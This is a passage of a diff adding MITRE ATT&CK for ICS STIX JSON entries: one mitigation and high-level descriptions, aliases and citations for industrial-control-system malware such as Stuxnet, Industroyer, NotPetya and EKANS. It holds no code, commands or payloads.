4 - SC-40" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0806", + "external_id": "M0806" + }, + { + "source_name": "CISA March 2010", + "description": "CISA 2010, March Securing Wireless Networks Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-003" + }, + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:04:48.834Z", + "name": "EKANS", + "description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. 
[EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "type": "malware", + "id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "created": "2021-02-12T20:07:42.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0605", + "external_id": "S0605" + }, + { + "source_name": "EKANS", + "description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "SNAKEHOSE", + "description": "(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "Dragos EKANS", + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "Palo Alto Unit 42 EKANS", + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + }, + { + "source_name": "FireEye Ransomware Feb 2020", + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. 
Retrieved March 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:18:25.971Z", + "name": "Backdoor.Oldrea", + "description": "[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "Backdoor.Oldrea", + "Havex" + ], + "type": "malware", + "id": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0093", + "external_id": "S0093" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. 
(2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T13:50:55.168Z", + "name": "Stuxnet", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. 
[Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "Stuxnet", + "W32.Stuxnet" + ], + "type": "malware", + "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "created": "2020-12-14T17:34:58.457Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0603", + "external_id": "S0603" + }, + { + "source_name": "W32.Stuxnet", + "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) " + }, + { + "source_name": "CISA ICS Advisory ICSA-10-272-01", + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.", + "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + }, + { + "source_name": "ESET Stuxnet Under the Microscope", + "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. 
Retrieved December 7, 2020.", + "url": "https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf" + }, + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Industroyer", + "description": "[Industroyer](https://collaborate.mitre.org/attackics/index.php/Software/S0001) is a sophisticated piece of malware designed to cause an [Impact](https://collaborate.mitre.org/attackics/index.php/Impact) to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.(Citation: ESET Win32/Industroyer) Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride)(Citation: CISA Alert (TA17-163A))(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2019)", + "id": "malware--1d8dccb3-e779-4702-aeb1-6627a22cc585", + "type": "malware", 
+ "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1004", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0001" + }, + { + "source_name": "ESET Win32/Industroyer", + "description": "Anton Cherepanov, ESET. (2017, June 12). Win32/Industroyer: A new threat for industrial control systems. Retrieved September 15, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride", + "description": "Dragos Inc.. (2017, June 13). Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations. Retrieved September 18, 2017.", + "url": "https://www.dragos.com/wp-content/uploads/CrashOverride-01.pdf" + }, + { + "source_name": "CISA Alert TA17-163A CrashOverride June 2017", + "description": "CISA. (2017, June 12). Alert (TA17-163A). Retrieved October 22, 2019.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-163A" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Dragos. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved October 14, 2019.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + }, + { + "source_name": "Dragos Crashoverride 2019", + "description": "Joe Slowik. (2019, August 15). CRASHOVERRIDE: Reassessing the 2016 Ukraine Electric Power Event as a Protection-Focused Attack. 
Retrieved October 22, 2019.", + "url": "https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Bad Rabbit", + "Diskcoder.D" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://collaborate.mitre.org/attackics/index.php/Software/S0005) is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine. (Citation: ESET Bad Rabbit Oct 2017)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--242622ca-3903-43d5-8aa0-3bbdaa3020ec", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1001", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0005" + }, + { + "description": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "source_name": "ESET Bad Rabbit Oct 2017", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov. (2017, October 27). Bad Rabbit Ransomware. Retrieved October 27, 2019.", + "source_name": "Kaspersky Bad Rabbit Oct 2017", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "description": "Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. 
Retrieved October 27, 2019.", + "source_name": "Dragos IT Ransomware for ICS Environments Apr 2019", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "modified": "2022-10-12T17:29:57.200Z", + "name": "Bad Rabbit", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) ", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Bad Rabbit", + "Win32/Diskcoder.D" + ], + "type": "malware", + "id": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "created": "2021-02-09T14:35:39.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0606", + "external_id": "S0606" + }, + { + "source_name": "ESET Bad Rabbit", + "description": "M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + }, + { + "source_name": "Secure List Bad Rabbit", + "description": "Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + }, + { + "source_name": "Dragos IT ICS Ransomware", + "description": "Slowik, J.. 
(2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.", + "url": "https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Stuxnet" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Stuxnet", + "description": "[Stuxnet](https://collaborate.mitre.org/attackics/index.php/Software/S0010) was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.(Citation: Wired W32.Stuxnet Dossier Feb 2011)(Citation: Symantec W32.Stuxnet Writeup)(Citation: CISA ICS Advisory (ICSA-10-238-01B))(Citation: SCADAhacker Stuxnet Mitigation Jan 2014)", + "id": "malware--496bff4d-0700-4b28-b06f-f30a63002be7", + "x_mitre_version": "1.0", + "type": "malware", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-26T15:02:14.907Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S1008", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0010" + }, + { + "source_name": "Wired W32.Stuxnet Dossier Feb 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). 
Retrieved September 22, 2017.", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "source_name": "Symantec W32.Stuxnet Writeup", + "description": "Jarrad Shearer. (n.d.). W32.Stuxnet Writeup. Retrieved October 22, 2019.", + "url": "https://www.symantec.com/security-center/writeup/2010-071400-3123-99" + }, + { + "source_name": "CISA ICS Advisory ICSA-10-238-01B Stuxnet January 2014", + "description": "CISA. (2014, January 08). Stuxnet Malware Mitigation (Update B). Retrieved October 22, 2019.", + "url": "https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B" + }, + { + "source_name": "SCADAhacker Stuxnet Mitigation Jan 2014", + "description": "Joel Langill. (2014, January 21). Stuxnet Mitigation. Retrieved October 22, 2019.", + "url": "https://scadahacker.com/resources/stuxnet-mitigation.html" + }, + { + "source_name": "Langer Stuxnet Analysis Nov 2013", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Conficker", + "Downadup", + "Kido" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Conficker", + "description": "[Conficker](https://collaborate.mitre.org/attackics/index.php/Software/S0012) is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. 
Conficker made its way onto computers and removable disk drives in a nuclear power plant. (Citation: Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--49c04994-1035-4b58-89b7-cf8956e3b423", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1003", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0012" + }, + { + "description": "Catalin Cimpanu. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved October 14, 2019.", + "source_name": "Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "description": "Symantec. (2015, June 30). Simple steps to protect yourself from the Conficker Worm. Retrieved December 5, 2019.", + "source_name": "Symantec Conficker Jun 2015", + "url": "https://support.symantec.com/us/en/article.tech93179.html" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "modified": "2022-10-12T17:59:55.276Z", + "name": "PLC-Blaster", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. 
(Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016) ", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PLC-Blaster" + ], + "type": "malware", + "id": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1006", + "external_id": "S1006" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + }, + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:33:00.482Z", + "name": "BlackEnergy", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. 
It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "BlackEnergy", + "Black Energy" + ], + "type": "malware", + "id": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "created": "2017-05-31T21:32:57.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0089", + "external_id": "S0089" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:11:21.842Z", + "name": "NotPetya", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. 
As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "NotPetya", + "ExPetr", + "Diskcoder.C", + "GoldenEye", + "Petrwrap", + "Nyetya" + ], + "type": "malware", + "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0368", + "external_id": "S0368" + }, + { + "source_name": "ExPetr", + "description": "(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "Diskcoder.C", + "description": "(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "GoldenEye", + "description": "(Citation: Talos Nyetya June 2017)" + }, + { + "source_name": "Nyetya", + "description": "(Citation: Talos Nyetya June 2017)" + }, + { + "source_name": "Petrwrap", + "description": "(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "ESET Telebots June 2017", + "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.", + "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/" + }, + { + "source_name": "Talos Nyetya June 2017", + "description": "Chiu, A. (2016, June 27). 
New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "US-CERT NotPetya 2017", + "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:15:47.458Z", + "name": "Conficker", + "description": "[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Conficker", + "Kido", + "Downadup" + ], + "type": "malware", + "id": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "created": "2021-02-23T20:50:32.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/software/S0608", + "external_id": "S0608" + }, + { + "source_name": "Kido", + "description": "(Citation: SANS Conficker) " + }, + { + "source_name": "Downadup", + "description": "(Citation: SANS Conficker) " + }, + { + "source_name": "SANS Conficker", + "description": "Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.", + "url": "https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm" + }, + { + "source_name": "Conficker Nuclear Power Plant", + "description": "Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:03:50.370Z", + "name": "LockerGoga", + "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "LockerGoga" + ], + "type": "malware", + "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "created": 